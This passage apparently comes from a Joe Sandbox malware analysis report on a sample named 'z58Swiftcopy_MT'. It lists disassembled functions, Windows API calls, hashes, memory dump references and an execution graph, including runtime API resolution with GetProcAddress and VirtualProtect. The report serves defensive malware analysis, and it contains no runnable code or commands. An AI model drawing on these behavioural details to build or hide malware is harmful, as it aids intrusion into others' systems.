                                                                                                                                                                                                                                      • Opcode ID: cc976631f63ab64371ec6397e0998f8e0ccbda94530cdc87a4e9cd2a1bc3c647
                                                                                                                                                                                                                                      • Instruction ID: 942d740d8c3c01bede0812328a3a4706cce13fdf2e849e9dfea5930b7654417c
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cc976631f63ab64371ec6397e0998f8e0ccbda94530cdc87a4e9cd2a1bc3c647
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D4F096B0600204EFEB04DF55D899F6A33E8EF04701F1440B9F909DB1D1E7B89A04C729
                                                                                                                                                                                                                                      Function 0040DCE0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040DCE6,00000000,0040DB99,?,00000000,00000208,?), ref: 00409BD5
                                                                                                                                                                                                                                      • wcsrchr.MSVCRT ref: 0040DCE9
                                                                                                                                                                                                                                      • wcscat.MSVCRT ref: 0040DCFF
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: FileModuleNamewcscatwcsrchr
                                                                                                                                                                                                                                      • String ID: _lng.ini
                                                                                                                                                                                                                                      • API String ID: 383090722-1948609170
                                                                                                                                                                                                                                      • Opcode ID: 5efb5a13be846493ae7bde14296389ab58a252fc212a622dbc96a3230e290a6c
                                                                                                                                                                                                                                      • Instruction ID: 003e7a9acac466aac22365d7a2b75ab102816a5e64793edac74c8fca87dba5cc
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5efb5a13be846493ae7bde14296389ab58a252fc212a622dbc96a3230e290a6c
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CEC0129654561430F51526116C03B4E12585F13316F21006BFD01340C3EFAD5705406F
                                                                                                                                                                                                                                      Function 00414B81 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 13libraryloaderCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                                                                        • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                                                                                                                                                                        • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                                                                        • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                                                                                                                                                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: LibraryLoad$AddressDirectoryProcSystemmemsetwcscatwcscpy
                                                                                                                                                                                                                                      • String ID: SHGetSpecialFolderPathW$shell32.dll
                                                                                                                                                                                                                                      • API String ID: 2773794195-880857682
                                                                                                                                                                                                                                      • Opcode ID: 92b59310a7696b31d56b4dabc8b2146732067b292673cf67eedff05cdcb4dbe7
                                                                                                                                                                                                                                      • Instruction ID: 520684b8054713cb13715c6c8af1848dbb459e29e8538d47b3508bbaa4bbc045
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 92b59310a7696b31d56b4dabc8b2146732067b292673cf67eedff05cdcb4dbe7
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 23D0C7719483019DD7105F65AC19B8336545B50307F204077AC04E66D7EA7CC4C49E1D
                                                                                                                                                                                                                                      Function 0040A153 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 12COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetWindowLongW.USER32(?,000000EC), ref: 0040A159
                                                                                                                                                                                                                                      • SetWindowLongW.USER32(000000EC,000000EC,00000000), ref: 0040A16B
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: LongWindow
                                                                                                                                                                                                                                      • String ID: MZ@
                                                                                                                                                                                                                                      • API String ID: 1378638983-2978689999
                                                                                                                                                                                                                                      • Opcode ID: 897d752f6043cc922bbe5e3779e5fd859b92255b25006c63bcdd8f44162c87a9
                                                                                                                                                                                                                                      • Instruction ID: 658df1d6f65a5f4ca5cf2dc917bfbc57e2b12ac14a328fb0c2cac09aa770bd9f
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 897d752f6043cc922bbe5e3779e5fd859b92255b25006c63bcdd8f44162c87a9
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3FC0027415D116AFDF112B35EC0AE2A7EA9BB86362F208BB4B076E01F1CB7184109A09
                                                                                                                                                                                                                                      Function 0042B9BD Relevance: 5.2, APIs: 4, Instructions: 181COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000000,?), ref: 0042BA5F
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,?,?), ref: 0042BA98
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0042BAAE
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000000,?,?,?,?,?,?,?), ref: 0042BAE7
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memcpy$memset
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 438689982-0
                                                                                                                                                                                                                                      • Opcode ID: 03305e9dc29a3088a8453c5c8815f649f32074ab8e1cbf0618065e1a77e51243
                                                                                                                                                                                                                                      • Instruction ID: 797e1fd24865db6de4a95defd5ca955254a0dec7c2ff798398e4890fb9874305
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 03305e9dc29a3088a8453c5c8815f649f32074ab8e1cbf0618065e1a77e51243
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1B51A2B5A00219EBDF14DF55D882BAEBBB5FF04340F54806AE904AA245E7389E50DBD8
                                                                                                                                                                                                                                      Function 0040E820 Relevance: 5.1, APIs: 4, Instructions: 70COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 0040A13C: memset.MSVCRT ref: 0040A14A
                                                                                                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT ref: 0040E84D
                                                                                                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E874
                                                                                                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E895
                                                                                                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E8B6
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ??2@$memset
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1860491036-0
                                                                                                                                                                                                                                      • Opcode ID: 96af4030734a5e2f6ef23c2ae6277f6dabdb1784b135b246f31e93988d402875
                                                                                                                                                                                                                                      • Instruction ID: 7dda0de82ffecb18951b1be6aadeef514c87807746e1e94fbb8d74dd8fa57bec
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 96af4030734a5e2f6ef23c2ae6277f6dabdb1784b135b246f31e93988d402875
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4F21F3B1A003008FDB219F2B9445912FBE8FF90310B2AC8AF9158CB2B2D7B8C454CF15
                                                                                                                                                                                                                                      Function 0040A8D0 Relevance: 5.1, APIs: 4, Instructions: 69COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • wcslen.MSVCRT ref: 0040A8E2
                                                                                                                                                                                                                                        • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                                                                                                                                                                        • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,00000000,00000000,00000000,?,0040A9F2,00000002,?,00000000,?,0040AD25,00000000,?,00000000), ref: 00409A28
                                                                                                                                                                                                                                        • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                                                                                                                                                                                      • free.MSVCRT ref: 0040A908
                                                                                                                                                                                                                                      • free.MSVCRT ref: 0040A92B
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,000000FF,00000001,?,00000000,?,?,0040AD76,?,000000FF), ref: 0040A94F
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: free$memcpy$mallocwcslen
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 726966127-0
                                                                                                                                                                                                                                      • Opcode ID: 48b5110f71ff603a034409774c278151667955e8266c70f87da55b4d75e749d9
                                                                                                                                                                                                                                      • Instruction ID: f32a9ac0308abec2140ef864181b54c8d04bf3279582b466e144db770ea3622c
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 48b5110f71ff603a034409774c278151667955e8266c70f87da55b4d75e749d9
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 64217CB2200704EFC720DF18D88189AB3F9FF453247118A2EF866AB6A1CB35AD15CB55
                                                                                                                                                                                                                                      Function 0040B1D1 Relevance: 5.1, APIs: 4, Instructions: 67COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • wcslen.MSVCRT ref: 0040B1DE
                                                                                                                                                                                                                                      • free.MSVCRT ref: 0040B201
                                                                                                                                                                                                                                        • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                                                                                                                                                                        • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,00000000,00000000,00000000,?,0040A9F2,00000002,?,00000000,?,0040AD25,00000000,?,00000000), ref: 00409A28
                                                                                                                                                                                                                                        • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                                                                                                                                                                                      • free.MSVCRT ref: 0040B224
                                                                                                                                                                                                                                      • memcpy.MSVCRT(00000000,00000000,-00000002,00000000,00000000,?,?,?,?,0040B319,0040B432,00000000,?,?,0040B432,00000000), ref: 0040B248
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: free$memcpy$mallocwcslen
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 726966127-0
                                                                                                                                                                                                                                      • Opcode ID: dbfa2e27eb608a9f9479d75297a1486c58e4153ca5a873f0eddd30e24b8e668e
                                                                                                                                                                                                                                      • Instruction ID: 71128cbd9221161776fa816c6212d75478d488e0bdd8d9cf72ea7cd81dda7be0
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: dbfa2e27eb608a9f9479d75297a1486c58e4153ca5a873f0eddd30e24b8e668e
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 02215BB2500604EFD720DF18D881CAAB7F9EF49324B114A6EE452976A1CB35B9158B98
                                                                                                                                                                                                                                      Function 00408ADC Relevance: 5.1, APIs: 4, Instructions: 63COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memcmp.MSVCRT(?,004599B8,00000010,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408AF3
                                                                                                                                                                                                                                        • Part of subcall function 00408A6E: memcmp.MSVCRT(00409690,00408B12,00000004,000000FF), ref: 00408A8C
                                                                                                                                                                                                                                        • Part of subcall function 00408A6E: memcpy.MSVCRT(00000363,004096AA,4415FF50,?), ref: 00408ABB
                                                                                                                                                                                                                                        • Part of subcall function 00408A6E: memcpy.MSVCRT(-00000265,004096AF,00000060,00000363,004096AA,4415FF50,?), ref: 00408AD0
                                                                                                                                                                                                                                      • memcmp.MSVCRT(?,00000000,0000000E,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408B2B
                                                                                                                                                                                                                                      • memcmp.MSVCRT(?,00000000,0000000B,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408B5C
                                                                                                                                                                                                                                      • memcpy.MSVCRT(0000023E,00409690,?), ref: 00408B79
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memcmp$memcpy
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 231171946-0
                                                                                                                                                                                                                                      • Opcode ID: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                                                                                                                                                                                                                      • Instruction ID: 684d12db3f6cc64b33ac9287d8c213aaad77bc3869a84850190dd4d7d2050874
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8411A9F1600308AAFF202A129D07F5A3658DB21768F25443FFC84641D2FE7DAA50C55E
                                                                                                                                                                                                                                      Function 0040B0D1 Relevance: 5.1, APIs: 4, Instructions: 55stringCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • strlen.MSVCRT ref: 0040B0D8
                                                                                                                                                                                                                                      • free.MSVCRT ref: 0040B0FB
                                                                                                                                                                                                                                        • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                                                                                                                                                                        • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,00000000,00000000,00000000,?,0040A9F2,00000002,?,00000000,?,0040AD25,00000000,?,00000000), ref: 00409A28
                                                                                                                                                                                                                                        • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                                                                                                                                                                                      • free.MSVCRT ref: 0040B12C
                                                                                                                                                                                                                                      • memcpy.MSVCRT(00000000,?,00000000,00000000,0040B35A,?), ref: 0040B159
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: free$memcpy$mallocstrlen
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3669619086-0
                                                                                                                                                                                                                                      • Opcode ID: 04e6466bee9c2f86a7d5fc6531cc0ab8b23c91005f7f75429686add4e9716e46
                                                                                                                                                                                                                                      • Instruction ID: 61abf4b4d63bdfee40e3433ef4540d9b033b11d4199be086b3082c0bee804e2f
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 04e6466bee9c2f86a7d5fc6531cc0ab8b23c91005f7f75429686add4e9716e46
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CA113A712042019FD711DB98FC499267B66EB8733AB25833BF4045A2A3CBB99834865F
                                                                                                                                                                                                                                      Function 004173E4 Relevance: 5.0, APIs: 4, Instructions: 41COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,00417D63,?,?,00417D63,00418178,00000000,?,004183E5,?,00000000), ref: 004173FF
                                                                                                                                                                                                                                      • malloc.MSVCRT ref: 00417407
                                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,?,00417D63,00418178,00000000,?,004183E5,?,00000000,00000000,?), ref: 0041741E
                                                                                                                                                                                                                                      • free.MSVCRT ref: 00417425
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ByteCharMultiWide$freemalloc
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2605342592-0
                                                                                                                                                                                                                                      • Opcode ID: 2d709113fcafe1a04d94ccb325df1834664bd2c227d6907f8f745ae81c56706a
                                                                                                                                                                                                                                      • Instruction ID: cad4d062c051d68cf548c6c9b5623cfc012c7edadb1d539185634ca375d1558c
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2d709113fcafe1a04d94ccb325df1834664bd2c227d6907f8f745ae81c56706a
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E7F0377620921E7BDA1029655C40D77779CEB8B675B11072BBA10D21C1ED59D81005B5
                                                                                                                                                                                                                                      Function 00409D1F Relevance: 5.0, APIs: 4, Instructions: 32COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: wcslen$wcscat$wcscpy
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1961120804-0
                                                                                                                                                                                                                                      • Opcode ID: 053325bc158fb100898e7a98b0c486d6a7ee737d4dfc05f729e58fd5416b10d2
                                                                                                                                                                                                                                      • Instruction ID: 298d28553a3f700387dea6c06157f027a7ba74c69b0fe1c0d14b010c740a3b55
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 053325bc158fb100898e7a98b0c486d6a7ee737d4dfc05f729e58fd5416b10d2
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3AE0E532000114BADF116FB2D8068CE3B99EF42364751883BFD08D2043EB3ED511869E

                                                                                                                                                                                                                                      Execution Graph

                                                                                                                                                                                                                                      Execution Coverage:2.4%
                                                                                                                                                                                                                                      Dynamic/Decrypted Code Coverage:19.8%
                                                                                                                                                                                                                                      Signature Coverage:0.5%
                                                                                                                                                                                                                                      Total number of Nodes:874
                                                                                                                                                                                                                                      Total number of Limit Nodes:22
                                                                                                                                                                                                                                      execution_graph 34107 40fc40 70 API calls 34280 403640 21 API calls 34108 427fa4 42 API calls 34281 412e43 _endthreadex 34282 425115 76 API calls 34283 43fe40 133 API calls 34111 425115 83 API calls 34112 401445 memcpy memcpy DialogBoxParamA 34113 440c40 34 API calls 34115 411853 RtlInitializeCriticalSection memset 34116 401455 ExitProcess GetWindowLongA SetWindowLongA EnumChildWindows EnumChildWindows 34289 40a256 13 API calls 34291 432e5b 17 API calls 34293 43fa5a 20 API calls 34118 401060 41 API calls 34296 427260 CloseHandle memset memset 33168 410c68 FindResourceA 33169 410c81 SizeofResource 33168->33169 33172 410cae 33168->33172 33170 410c92 LoadResource 33169->33170 33169->33172 33171 410ca0 LockResource 33170->33171 33170->33172 33171->33172 34298 405e69 14 API calls 34123 433068 15 API calls 34300 414a6d 18 API calls 34301 43fe6f 134 API calls 34125 424c6d 15 API calls 34302 426741 19 API calls 34127 440c70 17 API calls 34128 443c71 44 API calls 34131 427c79 24 API calls 34305 416e7e memset 34135 42800b 47 API calls 34136 425115 85 API calls 34308 41960c 61 API calls 34137 43f40c 122 API calls 34140 411814 InterlockedCompareExchange RtlDeleteCriticalSection 34141 43f81a 20 API calls 34143 414c20 memset memset 34144 410c22 memset _itoa WritePrivateProfileStringA GetPrivateProfileIntA 34312 414625 18 API calls 34313 404225 modf 34314 403a26 strlen WriteFile 34316 40422a 12 API calls 34320 427632 memset memset memcpy 34321 40ca30 59 API calls 34322 404235 26 API calls 34145 42ec34 61 API calls 34146 425115 76 API calls 34323 425115 77 API calls 34325 44223a 38 API calls 34152 43183c 112 API calls 34326 44b2c5 _onexit __dllonexit 34331 42a6d2 memcpy 34154 405cda 65 API calls 34339 43fedc 138 API calls 34340 4116e1 16 API calls 34157 4244e6 19 API calls 34159 42e8e8 127 API calls 34160 4118ee RtlLeaveCriticalSection 34345 43f6ec 22 API calls 34162 425115 119 API calls 33158 410cf3 EnumResourceNamesA 34348 4492f0 memcpy memcpy 34350 43fafa 18 API calls 34352 4342f9 15 API calls 34163 4144fd 19 API calls 34354 4016fd NtdllDefWindowProc_A ??2@YAPAXI memset memcpy ??3@YAXPAX 34355 40b2fe LoadIconA LoadIconA SendMessageA SendMessageA SendMessageA 34358 443a84 _mbscpy 34360 43f681 17 API calls 34166 404487 22 API calls 34362 415e8c 16 API calls 34170 411893 RtlDeleteCriticalSection 34171 41a492 42 API calls 34366 403e96 34 API calls 34367 410e98 memset SHGetPathFromIDList SendMessageA 34173 426741 109 API calls 34174 4344a2 18 API calls 34175 4094a2 10 API calls 34370 4116a6 15 API calls 34371 43f6a4 17 API calls 34372 440aa3 20 API calls 34374 427430 45 API calls 34178 4090b0 7 API calls 34179 4148b0 15 API calls 34181 4118b4 RtlEnterCriticalSection 34182 4014b7 CreateWindowExA 34183 40c8b8 19 API calls 34185 4118bf RtlTryEnterCriticalSection 34379 42434a 18 API calls 34381 405f53 12 API calls 34193 43f956 59 API calls 34195 40955a 17 API calls 34196 428561 36 API calls 34197 409164 7 API calls 34385 404366 19 API calls 34389 40176c ExitProcess 34392 410777 42 API calls 34202 40dd7b 51 API calls 34203 425d7c 16 API calls 34394 43f6f0 25 API calls 34395 42db01 22 API calls 34204 412905 15 API calls 34396 403b04 54 API calls 34397 405f04 SetDlgItemTextA GetDlgItemTextA 34398 44b301 ??3@YAXPAX 34401 4120ea 14 API calls 34402 40bb0a 8 API calls 34404 413f11 strcmp 34208 434110 17 API calls 34211 425115 108 API calls 34405 444b11 _onexit 34213 425115 76 API calls 34216 429d19 10 API calls 34408 444b1f __dllonexit 34409 409f20 _strcmpi 34218 42b927 31 API calls 34412 433f26 19 API calls 34413 44b323 FreeLibrary 34414 427f25 46 API calls 34415 43ff2b 17 API calls 34416 43fb30 19 API calls 34225 414d36 16 API calls 34227 40ad38 7 API calls 34418 433b38 16 API calls 34098 44b33b 34099 44b344 ??3@YAXPAX 34098->34099 34100 44b34b 34098->34100 34099->34100 34101 44b354 ??3@YAXPAX 34100->34101 34102 44b35b 34100->34102 34101->34102 34103 44b364 ??3@YAXPAX 34102->34103 34104 44b36b 34102->34104 34103->34104 34105 44b374 ??3@YAXPAX 34104->34105 34106 44b37b 34104->34106 34105->34106 34231 426741 21 API calls 34232 40c5c3 125 API calls 34234 43fdc5 17 API calls 34419 4117c8 InterlockedCompareExchange RtlInitializeCriticalSection 34237 4161cb memcpy memcpy memcpy memcpy 33173 44b3cf 33174 44b3e6 33173->33174 33179 44b454 33173->33179 33174->33179 33186 44b40e GetModuleHandleA 33174->33186 33176 44b45d GetModuleHandleA 33180 44b467 33176->33180 33177 44b49a 33199 44b49f 33177->33199 33179->33176 33179->33177 33179->33180 33180->33179 33181 44b487 GetProcAddress 33180->33181 33181->33179 33182 44b405 33182->33179 33182->33180 33183 44b428 GetProcAddress 33182->33183 33183->33179 33184 44b435 VirtualProtect 33183->33184 33184->33179 33185 44b444 VirtualProtect 33184->33185 33185->33179 33187 44b417 33186->33187 33189 44b454 33186->33189 33218 44b42b GetProcAddress 33187->33218 33191 44b45d GetModuleHandleA 